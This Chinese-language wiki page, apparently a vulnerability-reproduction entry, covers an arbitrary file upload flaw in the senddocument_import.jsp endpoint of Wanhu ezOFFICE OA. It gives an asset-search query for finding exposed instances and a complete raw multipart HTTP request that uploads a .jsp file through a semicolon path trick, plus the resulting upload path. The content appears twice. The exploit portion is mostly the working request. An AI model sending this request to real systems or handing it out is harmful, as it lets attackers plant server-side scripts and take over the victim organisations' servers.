fofamini-wiki

登录白背景

源码

万户协同办公平台senddocument_import存在任意文件上传漏洞

一、漏洞简介

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台senddocument_import存在任意文件上传漏洞

二、影响版本

万户ezoffice

三、资产测绘

hunterapp.name="万户 Ezoffice OA"
登录页面

四、漏洞复现

POST /defaultroot/modules/govoffice/gov_documentmanager/senddocument_import.jsp;?categoryId=null&path=loginpage&mode=add&fileName=null&saveName=null&fileMaxSize=0&fileMaxNum=null&fileType=jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 288
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="photo"; filename="stc.jsp"

stc
--00content0boundary00
Content-Disposition: form-data; name="continueUpload"

0
--00content0boundary00
Content-Disposition: form-data; name="submit"

导入
--00content0boundary00--

上传文件位置,注意最后需添加一个;

/defaultroot/upload/loginpage/2023112001240329341614287.jsp;

原文: https://www.yuque.com/xiaokp7/ocvun2/iihuyd5cwobqek3s

# 万户协同办公平台senddocument_import存在任意文件上传漏洞

# 一、漏洞简介
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台senddocument_import存在任意文件上传漏洞

# 二、影响版本

- 万户ezoffice

# 三、资产测绘

- hunter`app.name="万户 Ezoffice OA"`
- 登录页面

![image.png](./img/Qd-5SaAnmDINDHTD/1694241158110-8d4eef16-79f1-46eb-899b-344bd2a7a19f-591182.png)

# 四、漏洞复现
```
POST /defaultroot/modules/govoffice/gov_documentmanager/senddocument_import.jsp;?categoryId=null&path=loginpage&mode=add&fileName=null&saveName=null&fileMaxSize=0&fileMaxNum=null&fileType=jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Type: multipart/form-data; boundary=00content0boundary00
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 288
Connection: close

--00content0boundary00
Content-Disposition: form-data; name="photo"; filename="stc.jsp"

stc
--00content0boundary00
Content-Disposition: form-data; name="continueUpload"

0
--00content0boundary00
Content-Disposition: form-data; name="submit"

导入
--00content0boundary00--

```
![image.png](./img/Qd-5SaAnmDINDHTD/1700414857287-75e5729f-0a31-48c1-8867-bd14ea937f20-799332.png)
上传文件位置,注意最后需添加一个`;`
```
/defaultroot/upload/loginpage/2023112001240329341614287.jsp;
```
![image.png](./img/Qd-5SaAnmDINDHTD/1700414922582-83b76fec-742f-485f-9101-0a7518a37d27-507685.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/iihuyd5cwobqek3s>